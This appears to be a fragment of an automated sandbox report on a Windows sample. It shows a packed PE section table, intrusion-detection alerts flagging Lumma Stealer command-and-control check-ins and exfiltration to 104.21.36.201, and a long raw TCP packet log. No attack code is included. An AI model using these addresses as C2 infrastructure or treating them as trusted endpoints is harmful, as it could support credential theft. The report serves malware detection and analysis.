| .rsrc | 0x53000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| audsrymt | 0x55000 | 0x2a9000 | 0x2a9000 | c93c9c27546c3da596e7ad9e16ac4d0a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| ilsizkav | 0x2fe000 | 0x1000 | 0x400 | b227308ef76079a8458083905793bf5b | False | 0.7978515625 | data | 6.188355822721415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x2ff000 | 0x3000 | 0x2200 | c3c3c37d537bda5b4cabd2ae44a16d89 | False | 0.06433823529411764 | DOS executable (COM) | 0.8041884164567935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |


| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |


| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-24T11:22:15.764205+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49713 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:16.534676+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49713 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:16.534676+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49713 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:17.763090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49715 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:18.546479+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49715 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:18.546479+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49715 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:20.679767+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49721 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:21.742397+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49721 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:23.057783+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49728 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:25.786477+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49739 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:28.785092+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49745 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:31.182861+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49752 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:36.142637+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49766 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:36.779245+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49766 | 104.21.36.201 | 443 | TCP |
| 2024-12-24T11:22:38.725809+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49773 | 185.166.143.48 | 443 | TCP |
| 2024-12-24T11:22:41.110802+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49784 | 16.182.108.137 | 443 | TCP |

                                                                                                                                                              Dec 24, 2024 11:22:16.549568892 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:16.549649000 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:16.550100088 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:16.550131083 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:17.762986898 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:17.763089895 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:17.764295101 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:17.764313936 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:17.764661074 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:17.765969992 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:17.766012907 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:17.766082048 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546523094 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546606064 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546643019 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546669006 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.546677113 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546694040 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546717882 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.546761990 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.546802998 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.546823978 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.554883957 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.554960966 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.554977894 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.571687937 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.571779013 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.571799994 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.627779007 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.666169882 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.721476078 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.721494913 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740379095 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740430117 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.740447998 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740602016 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740649939 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.740741968 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.740782976 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:18.740808010 CET49715443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:18.740828991 CET44349715104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:19.465776920 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:19.465815067 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:19.465902090 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:19.466430902 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:19.466444969 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:20.679661989 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:20.679766893 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:20.681937933 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:20.681945086 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:20.682187080 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:20.683687925 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:20.683908939 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:20.683954000 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.742428064 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.742568970 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.742662907 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.742728949 CET49721443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.742748022 CET44349721104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.845669031 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.845719099 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:21.845812082 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.846107006 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:21.846121073 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.057637930 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.057782888 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.059745073 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.059752941 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.059993029 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.061757088 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.062007904 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.062042952 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.062104940 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:23.107323885 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.959224939 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.959367990 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:23.959424019 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.110380888 CET49728443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.110407114 CET44349728104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:24.573735952 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.573811054 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:24.573896885 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.574450016 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:24.574470997 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.786355019 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.786477089 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.787806034 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.787818909 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.788062096 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.789244890 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.789364100 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.789402962 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:25.789479971 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:25.789490938 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:26.720887899 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:26.721004009 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:26.721204996 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:26.732125998 CET49739443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:26.732145071 CET44349739104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:27.572170019 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:27.572201967 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:27.572278023 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:27.572659969 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:27.572670937 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:28.784957886 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:28.785092115 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:28.786437035 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:28.786443949 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:28.786773920 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:28.788058043 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:28.788158894 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:28.788170099 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.557058096 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.557167053 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.557212114 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.557332039 CET49745443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.557348967 CET44349745104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.970520020 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.970572948 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:29.970690966 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.971062899 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:29.971080065 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.182782888 CET44349752104.21.36.201192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:31.182861090 CET49752443192.168.2.6104.21.36.201
                                                                                                                                                              Dec 24, 2024 11:22:42.421663046 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.422406912 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.422420979 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.422466993 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.422472954 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.422502041 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.423388958 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.423433065 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.423451900 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.423456907 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.423487902 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.423515081 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.427443981 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.427460909 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.427510977 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.427536011 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.427550077 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.427637100 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.428286076 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.432408094 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.432423115 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.432478905 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.432486057 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.487113953 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.534847021 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.551064014 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.551085949 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.551141024 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.551173925 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.551187038 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.566334963 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.566378117 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.566402912 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.566421986 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.566576958 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.566576958 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.579714060 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.579732895 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.579941988 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.579952002 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.580112934 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.581407070 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.593754053 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.593772888 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.593851089 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.593866110 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.607134104 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.607155085 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.607345104 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.607368946 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.620398998 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.620415926 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.620580912 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.620589018 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.634109974 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.634129047 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.634172916 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.634181976 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.634211063 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.657738924 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.657794952 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.657813072 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.657820940 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.657975912 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.671103954 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.671160936 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.671282053 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.671282053 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.671293974 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.684299946 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.684366941 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.684375048 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.684389114 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.684672117 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.686156034 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.686326027 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.699485064 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.699502945 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.699532032 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.699589014 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.699596882 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.699754953 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.712971926 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.713041067 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.713053942 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.713074923 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.713109970 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.726187944 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.726284027 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.726295948 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.726309061 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.726362944 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.726367950 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.726413012 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.739090919 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.739140987 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.739228964 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.739299059 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.739316940 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.739337921 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.751436949 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.751486063 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.751517057 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.751526117 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.751702070 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.762087107 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.762141943 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.762170076 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.762176037 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.762341976 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.772279024 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.772350073 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.772361040 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.772366047 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.772520065 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.772525072 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.772569895 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.780613899 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.780659914 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.780692101 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.780698061 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:42.780728102 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:42.780746937 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.326622009 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.329399109 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.329499006 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.329499960 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.329514027 CET4434978416.182.108.137192.168.2.6
                                                                                                                                                              Dec 24, 2024 11:22:43.329575062 CET49784443192.168.2.616.182.108.137
                                                                                                                                                              Dec 24, 2024 11:22:43.330081940 CET4434978416.182.108.137192.168.2.6
